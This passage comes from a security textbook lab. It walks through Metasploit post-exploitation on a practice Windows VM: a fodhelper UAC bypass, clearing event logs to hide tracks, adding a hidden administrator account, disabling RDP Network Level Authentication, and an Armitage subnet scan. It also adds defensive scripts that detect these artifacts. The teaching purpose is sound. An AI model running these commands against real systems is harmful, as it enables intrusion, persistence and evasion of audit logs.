ipconfig /displaydns

f.   Clear the machine’s DNS resolver cache with

ipconfig /flushdns

Verify that the entries are gone by executing

ipconfig /displaydns

again. This could be useful for a DNS cache poisoning attack (covered in Chapter 7).

g.   The victim machine can be leveraged by the attacker to be an attacking machine, as the attacker can now willfully send traffic from the victim machine to anywhere.

If you didn’t perform the lab exercises of Chapters 15 or 16, which included installing Wireshark on the Windows 10 VM, install Wireshark now by going to https://www.wireshark.org, clicking in the circle above Download, clicking Windows Installer (64-bit), clicking the Save File button, and then double-clicking the installer in the Downloads folder when the download completes. Accept all default settings.

Open up Wireshark and start sniffing on the Ethernet0 interface with a display filter of icmp.

From the Windows command prompt you opened through Meterpreter, send continuous pings from the victim machine with

ping -t 8.8.8.8

You’ll notice the traffic in Wireshark on the victim machine.

The victim machine can be used in a botnet in this fashion as part of a distributed denial-of-service (DDoS) attack. Stop the pings in Meterpreter by pressing CTRL-C and then typing y and pressing ENTER.

h.   Go back to the Windows command prompt by entering

shell

again. Now enter

powershell

and, amazingly enough, you have a PowerShell interface. Chapter 20 provides lab exercises featuring PowerShell attacks, including fileless malware. All of those attacks can now be performed directly by the attacker on the victim machine.

Type exit and press ENTER, and then type exit and press ENTER again to go back to the Meterpreter shell.

Image 4a–4i

Step 4 For this step, watch on the Windows 10 VM as you execute the commands from Meterpreter on the Kali Linux VM. Meterpreter’s working directory on the victim should, by default, be the Downloads folder, since that’s where the payload was launched. The output of each command will be displayed on the screen.

Explore Meterpreter file- and directory management–related commands on the victim machine.

a.   From Meterpreter, launch a Windows command prompt again with the command shell. Make a directory on the victim machine with

md ransomware

b.   Verify that it was created by generating a directory listing with

dir

You’ll notice the name of the ransomware directory in the output.

c.   Change directories into the ransomware directory with

cd ransomware

d.   Create a text file named warning.txt and redirect the output string of an echo command to that file as follows:

echo If you don't pay, your encrypted files will be deleted! > warning.txt

From the Windows 10 VM, open up the file using Windows Explorer (just to see it) and then close it. Then go back to the Kali Linux VM and continue from the shell in which you’ve been executing these commands.

e.   Display the contents of the file with

type warning.txt

f.   Delete the file with

del warning.txt

g.   Change directories up one level with

cd ..

h.   Remove the ransomware directory with

rd ransomware

i.   Verify that the ransomware directory is gone with

dir

You’ll notice the name of the ransomware directory is no longer in the output.

Imagine the possibilities of what an attacker would be able to do with direct access to the file system on a victim machine!

Enter exit to return to Meterpreter.

Image 5a–5e

Step 5 The current Metasploit session does not have full control over the victim machine because of the User Account Control (UAC) settings on Windows 10, which present a dialog box before important changes are made to the operating system. This ensures that an administrator’s approval is given before changes can be made by applications, users, and especially malware. In this step, you’ll bypass the UAC and perform administrative tasks on the victim machine with a second exploit. Pentesters and attackers often have to escalate privileges to get further than the level of access they start with when exploiting a machine.

a.   In Meterpreter, enter

clearev

which will try to clear the Event Viewer logs. It won’t work, and you’ll get an error message due to the UAC settings.

b.   This restriction is only temporary. You can bypass the UAC with the following sequence of commands.

Enter

background

in the Meterpreter shell. This puts the current Meterpreter session on hold in the background and brings you back to the msf6 exploit(multi/handler) > prompt. Notice the background session number at the end of the output.

At the msf6 exploit(multi/handler) > prompt, enter

use exploit/windows/local/bypassuac_fodhelper

This is a new exploit you’re going to unleash on the already hijacked Windows 10 system.

At the msf6 exploit(windows/local/bypassuac_fodhelper) > prompt, enter

sessions -i

to get the session ID (which matches what you saw at the end of the output from the background command). Then use that number in the following command. Mine, for example, is 1:

set session 1

This brings the session you put in the background back to the foreground.

At the msf6 exploit(windows/local/bypassuac_fodhelper) > prompt, enter

exploit

This unleashes the new exploit at the already hijacked Windows 10 system.

This sequence of commands hijacks a registry key and inserts a command that will be executed when C:\Windows\System32\fodhelper.exe runs. The binary fodhelper.exe (fod stands for “Features on Demand”) launches the Optional Features window when you click Optional Features from the Apps & Features Settings window. You can double-click C:\Windows\System32\fodhelper.exe to see the window that it launches. This trusted binary doesn’t show a UAC window when it runs, nor does it show a UAC window for the processes it spawns. Thus, when fodhelper.exe is called, the modified registry entry causes it to spawn a second shell with the UAC flag off, which gives Meterpreter the privileges it needs. The registry modification is reverted after the payload runs, keeping the change temporary and harder to detect.

c.   Pentesters and attackers want to cover their tracks, which is logically the last step in any attack. In the Windows 10 VM, right-click Start and select My Computer | Manage | System Tools | Event Viewer. Expand Windows Logs and examine the information it contains for the Application, Security, and System log entries.

d.   In Meterpreter, enter

clearev

Now it works! The log entries on the Windows 10 VM will disappear.

e.   Check out the logs in Event Viewer again. Quite a difference!

You will notice that the Security and System logs each contain a single new entry indicating that the log was cleared, which screams to systems administrators that a cyberattack happened. However, what happened before the clearing is no longer visible in those logs; thus, this is a great form of covering tracks.

Images 6a–6f

Step 6 The command-line interface (CLI) access is great, but imagine what you’d be able to do with a graphical user interface (GUI). You’ll find out now with Remote Desktop Protocol.

a.   In the Meterpreter shell, enter

info post/windows/manage/enable_rdp

to get info on the Windows Manage Enable Remote Desktop module.

b.   Run it with the following command:

run post/windows/manage/enable_rdp username=hacker password=AAAbbb111

Notice all of the background actions that are taking place, including opening a port in the local firewall if necessary, adding the user hacker (you can either do this with the mindset of a white hat hacker or a black hat hacker) with the password specified, adding the user to the Remote Desktop Users group, hiding the user from the Windows Login screen, and adding the user to the Administrators group. You’ll also notice a file path for cleaning up and covering your tracks, which will be referenced in Step 6e.

c.   Enter the following command (note that this is one command that wraps; do not press ENTER to break up this or the rest of the commands in the chapter):

reg setval -k 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -v UserAuthentication -d '0'

This command goes to a registry key (-k) and changes a value (-v) with specific data (-d). This is necessary to bypass the Require Computers to Use Network Level Authentication to Connect setting, a checkbox in the Advanced Settings of Remote Desktop Settings that is checked by default and that would otherwise prevent Remote Desktop access from the Kali Linux VM. This command and registry change override that setting.

d.   Run the command

idletime

to get an idea if there is a person actively using the exploited machine currently. This information is handy for deciding whether to continue with the next steps now or possibly after some time elapses.

e.   In a new Z shell terminal, enter

rdesktop -u hacker -p AAAbbb111 192.168.1.105

but using the IP address of your Windows 10 VM instead.

If you completed Chapter 14, you’ll see the logon warning made with a GPO. If so, click the OK button.

You’ll see the username of hacker with the following message: “Another user is signed in. If you continue, they’ll be disconnected. Do you want to sign in anyway?” This is where the idletime command comes in handy. If you saw a value for idletime that indicates a user might not be in front of the machine (for example, if they haven’t touched the keyboard for around 10 minutes or so), now is a good time to try this. Click the Yes button.

On the Windows 10 VM, you’ll now see the following message (with your machine’s name): “Do you want to allow WEISSMAN-CLIENT\hacker to connect to this machine?” Click OK to disconnect your session immediately or click Cancel to stay connected. No action will disconnect your session in 30 seconds. Assuming the user is not in front of their computer (based on the output from idletime), 30 seconds will elapse and the hacker account will be signed in. Now you’re no longer restricted to the Meterpreter shell or the Windows command prompt, and you can freely interact with the victim machine. Stealing the Windows password hashes and many more actions are now trivial to perform!

After you’ve completed your activities on the compromised machine, close the Remote Desktop window and, from Meterpreter, run the following cleanup script to remove the added account and cover your tracks:

run multi_console_command -r <file listed in output after you completed Step 6b>

Due to changes in the registry with Windows 10, the last operation will fail. Don’t worry about it.

In Chapter 11, you cracked Windows password hashes with Mimikatz. This step illustrates how you’d get into the system to get the hashes in the first place. Imagine the possibilities for an attacker, now, with full GUI access!

f.   From Meterpreter, either reboot or shut down the Windows 10 VM (yes, you can perform those actions from Meterpreter) with reboot or shutdown, respectively.
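Incident responders look for exactly the artifacts Steps 5 and 6 leave behind: the “log cleared” entries noted in Step 5e, the account creation and group additions from Step 6b, the Remote Desktop logon from Step 6e, and the registry change from Step 6c. The following Python script is an added example written for this chapter, not code from the lab or from Metasploit. It triages two constructed inputs: event records in the shape of a trimmed Get-WinEvent | ConvertTo-Json export (field names simplified) and a .reg export of the keys involved. The event IDs (1102, 104, 4720, 4732, and 4624 with logon type 10) are standard Windows IDs; the RDP-Tcp key is the one from Step 6c, while the Winlogon SpecialAccounts\UserList key is assumed to be what the enable_rdp module writes to hide the account from the logon screen. The usernames and timestamps are made up.

```python
"""Host-artifact triage for Step 5 (event logs cleared) and Step 6 (account added,
RDP enabled). Added example, not the lab's or Metasploit's code. Both inputs are
CONSTRUCTED: event records shaped like a trimmed `Get-WinEvent | ConvertTo-Json`
export, and a `reg export` (.reg) snapshot of the keys involved."""
import re
from collections import defaultdict

# Well-known Windows event IDs
SECURITY_LOG_CLEARED = 1102   # written to the Security log when it is cleared
SYSTEM_LOG_CLEARED = 104      # written to the System log when it is cleared
USER_CREATED = 4720
LOCAL_GROUP_MEMBER_ADDED = 4732
LOGON = 4624
REMOTE_INTERACTIVE = 10       # LogonType 10 = Remote Desktop logon
WATCHED_GROUPS = {"Administrators", "Remote Desktop Users"}

# Registry keys as a .reg export spells them. RDP_TCP_KEY is the key changed in
# Step 6c; the Winlogon UserList key is ASSUMED to be what enable_rdp uses to hide
# the new account from the logon screen.
RDP_TCP_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
               r"\WinStations\RDP-Tcp")
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")


def triage_events(records):
    """Flag log clearing and the create-user -> add-to-group -> RDP-logon chain.
    Property names mirror the event XML data names but are simplified: a real
    4732 usually carries the member as MemberSid (MemberName "-"), so resolve it."""
    findings, created, groups = [], set(), defaultdict(set)
    for r in records:
        eid, p = r["Id"], r.get("Properties", {})
        if eid == SECURITY_LOG_CLEARED and r["LogName"] == "Security":
            findings.append(f"Security log cleared at {r['TimeCreated']} "
                            f"by {p.get('SubjectUserName', '?')}")
        elif eid == SYSTEM_LOG_CLEARED and r["LogName"] == "System":
            findings.append(f"System log cleared at {r['TimeCreated']}")
        elif eid == USER_CREATED:
            created.add(p["TargetUserName"])
        elif eid == LOCAL_GROUP_MEMBER_ADDED and p["TargetUserName"] in WATCHED_GROUPS:
            member, group = p["MemberName"], p["TargetUserName"]   # group is TargetUserName in 4732
            groups[member].add(group)
            if member in created:
                findings.append(f"New account '{member}' added to local group '{group}'")
        elif eid == LOGON and p.get("LogonType") == REMOTE_INTERACTIVE:
            who = p["TargetUserName"]
            if who in created and groups[who]:
                findings.append(f"RDP logon by newly created account '{who}' "
                                f"(groups: {', '.join(sorted(groups[who]))})")
    return findings


def parse_reg_export(text):
    """Parse the subset of .reg syntax needed here: [key] headers and
    "name"=dword:XXXXXXXX values; string and binary values are ignored."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key is not None:
            m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
            if m:
                values[(key, m.group(1))] = int(m.group(2), 16)
    return values


def triage_registry(values):
    """Flag Network Level Authentication being disabled and hidden local accounts."""
    findings = []
    if values.get((RDP_TCP_KEY, "UserAuthentication")) == 0:
        findings.append("RDP Network Level Authentication disabled (UserAuthentication=0)")
    for (key, name), data in values.items():
        if key == USERLIST_KEY and data == 0:   # dword 0 under UserList hides the account
            findings.append(f"Account '{name}' hidden from the logon screen")
    return findings


# --- CONSTRUCTED sample inputs (usernames and times are made up) ---
SAMPLE_EVENTS = [
    {"LogName": "Security", "Id": 4720, "TimeCreated": "2024-01-01T10:00:01",
     "Properties": {"SubjectUserName": "labuser", "TargetUserName": "hacker"}},
    {"LogName": "Security", "Id": 4732, "TimeCreated": "2024-01-01T10:00:02",
     "Properties": {"MemberName": "hacker", "TargetUserName": "Remote Desktop Users"}},
    {"LogName": "Security", "Id": 4732, "TimeCreated": "2024-01-01T10:00:03",
     "Properties": {"MemberName": "hacker", "TargetUserName": "Administrators"}},
    {"LogName": "Security", "Id": 4624, "TimeCreated": "2024-01-01T10:05:00",
     "Properties": {"TargetUserName": "hacker", "LogonType": 10}},
    {"LogName": "Security", "Id": 1102, "TimeCreated": "2024-01-01T10:30:00",
     "Properties": {"SubjectUserName": "labuser"}},
    {"LogName": "System", "Id": 104, "TimeCreated": "2024-01-01T10:30:00", "Properties": {}},
]
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"hacker"=dword:00000000
"""

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS) + triage_registry(parse_reg_export(SAMPLE_REG)):
        print("FINDING:", f)
```

Run it as-is to see the findings on the constructed data; on a real host you would feed it the exported Security and System log records and a reg export of the two keys. The 1102 and 104 entries are the ones Step 5e shows surviving clearev, which is why a detection rule on those two IDs alone already catches the log clearing even when everything before it is gone.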

That’s a wrap!

Images 10 MINUTES

Lab Exercise 22.04: Armitage

Armitage is a GUI front end for the Metasploit Framework. You’re going to use it in this lab exercise to discover host systems. The detection of a high volume of traffic, which this lab exercise will generate, is also a great indication of an incident, which could lead to incident response.

Learning Objectives

In this lab exercise, you’ll add another tool to your arsenal. At the end of this lab exercise, you’ll be able to

•   Use Armitage to discover host systems

•   Understand how this will appear as an incident on the target network

•   Take the information from this lab and use it for port scanning, the logical next step

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   The Kali Linux VM you created in Chapter 1

•   As many systems as possible on your network

Let’s Do This!

Power on as many devices on your network as possible. The more the merrier! Laptops, desktops, phones, tablets, and more should all be ready for some probing.

Step 1 Install and launch Armitage.

a.   From a terminal on the Kali Linux VM, enter

sudo apt install armitage

Enter y and press ENTER to install Armitage when prompted.

b.   Start the RDBMS, like you did earlier, with

sudo /etc/init.d/postgresql start

c.   Launch Armitage with the following command:

sudo armitage

Click the Connect button in the first dialog box that pops up, keeping all default values, and then click the Yes button in the second dialog box that pops up. The “Connection refused” message will resolve itself very quickly, so don’t worry when you see that message.

Images 2b

Step 2 Use Armitage to discover hosts on a network.

a.   The lower pane, using tabs, shows the commands you would enter into the console if you weren’t using this GUI, along with the corresponding output. If you want, you can type directly into that pane at the msf6 > prompt.

b.   In the Armitage interface, in the top menu, select Hosts | Nmap Scan | Quick Scan (OS Detect) to discover all hosts on your subnet. You’ll need to provide your network ID and subnet mask, which in most cases will be 192.168.1.0/24, as shown in the dialog box. Only scan networks under your control that you’re authorized to scan, as discussed in Chapter 16.

Click the OK button after you enter the information.

When the scan is complete, a list of all discovered devices, including IP addresses, port information, and in some cases operating systems, will appear in the upper-right pane. Tons of valuable information will appear in the lower pane, as shown in Figure 22-2.

Image

FIGURE 22-2 Armitage discovers many systems in the Weissman household.

The next logical step would be some port scanning, with different types of scans, as covered in Chapter 16.
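From the network side, both the continuous pings sent from the victim in Lab Exercise 22.03 Step 3g and the Armitage host discovery scan in Step 2 above are visible in a packet capture such as the Wireshark session that lab sets up. The following Python script is an added example, not part of the lab, Wireshark, or Armitage. It reads a constructed CSV in the shape tshark produces with -T fields (frame.time_epoch, ip.src, ip.dst, icmp.type, tcp.dstport), flags sources that keep sending ICMP echo requests to one destination for a sustained period (the ping -t behavior), and flags sources that touch many distinct hosts within a short window (the subnet sweep). The sample addresses, the 192.168.1.0/24 range, and the thresholds are assumptions to be tuned for your own network.

```python
"""Capture triage for two kinds of traffic the labs generate: the continuous
`ping -t` from the victim (Lab 22.03, Step 3g) and the Armitage host discovery
scan (Lab 22.04, Step 2). Added example; the sample capture is CONSTRUCTED in the
shape of: tshark -r cap.pcap -T fields -E separator=, -e frame.time_epoch
         -e ip.src -e ip.dst -e icmp.type -e tcp.dstport"""
import csv
import io
from collections import defaultdict

ECHO_REQUEST = 8  # icmp.type 8 = echo request; 0 = echo reply


def parse_capture(csv_text):
    """Rows of (time, src, dst, icmp_type or None, tcp_dport or None)."""
    rows = []
    for t, src, dst, itype, dport in csv.reader(io.StringIO(csv_text)):
        rows.append((float(t), src, dst,
                     int(itype) if itype else None, int(dport) if dport else None))
    return rows


def sustained_echo_senders(rows, min_seconds=30, min_packets=30):
    """(src, dst, packets, seconds) for sources that keep sending echo requests to
    one destination. Windows `ping -t` is only one request per second, so the
    signal is duration, not rate; a flood would also trip this check."""
    streams = {}
    for t, src, dst, itype, _ in rows:
        if itype != ECHO_REQUEST:
            continue
        s = streams.setdefault((src, dst), {"first": t, "last": t, "count": 0})
        s["last"], s["count"] = t, s["count"] + 1
    return sorted((src, dst, s["count"], round(s["last"] - s["first"]))
                  for (src, dst), s in streams.items()
                  if s["count"] >= min_packets and s["last"] - s["first"] >= min_seconds)


def discovery_sweeps(rows, window=10.0, min_hosts=20):
    """(src, peak distinct destinations) for sources that touch at least
    min_hosts different hosts inside any `window`-second span: a subnet sweep."""
    by_src = defaultdict(list)
    for t, src, dst, _, _ in rows:
        by_src[src].append((t, dst))
    hits = []
    for src, events in by_src.items():
        events.sort()
        in_window, lo, peak = defaultdict(int), 0, 0
        for t, dst in events:
            in_window[dst] += 1
            while events[lo][0] < t - window:     # expire events older than the window
                old = events[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            peak = max(peak, len(in_window))
        if peak >= min_hosts:
            hits.append((src, peak))
    return hits


def build_sample_csv():
    """CONSTRUCTED capture: the victim (192.168.1.105) pinging 8.8.8.8 once per
    second for 60 s with replies, a scanner (192.168.1.50) probing every host in
    192.168.1.0/24 with an echo request and a TCP/443 probe within about 5 s, and
    a user (192.168.1.20) pinging the router three times."""
    lines = []
    for i in range(60):
        lines.append(f"{1000 + i:.3f},192.168.1.105,8.8.8.8,8,")
        lines.append(f"{1000 + i + 0.02:.3f},8.8.8.8,192.168.1.105,0,")
    for i in range(1, 255):
        t = 1100 + i * 0.02
        lines.append(f"{t:.3f},192.168.1.50,192.168.1.{i},8,")
        lines.append(f"{t + 0.001:.3f},192.168.1.50,192.168.1.{i},,443")
    for i in range(3):
        lines.append(f"{1200 + i:.3f},192.168.1.20,192.168.1.1,8,")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    rows = parse_capture(build_sample_csv())
    print("sustained echo senders:", sustained_echo_senders(rows))
    print("discovery sweeps:", discovery_sweeps(rows))
```

The sweep check deliberately ignores protocol and port: a quick Armitage scan mixes ICMP and TCP probes, and what makes it stand out is one source fanning out to most of a /24 in seconds, which normal hosts on a home or office network never do. The user who pings the router a few times and the victim that pings one external address are not reported by that check; the victim is caught by the duration check instead.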

Lab Analysis

1.   What is an incident?


2.   What is incident response?


3.   Why were the Metasploit Framework lab exercises important for understanding incident response?


Key Term Quiz

Use the terms from the list to complete the sentences that follow.

exploit

front end

payload

shell

vulnerability

1.   SMB is a(n) ____________.

2.   EternalBlue is a(n) ____________.

3.   windows/meterpreter/reverse_tcp is a(n) ____________.

4.   Before running native Windows commands on a compromised Windows system, the ____________ command must be run.

5.   Armitage is a(n) ____________ for the Metasploit Framework.
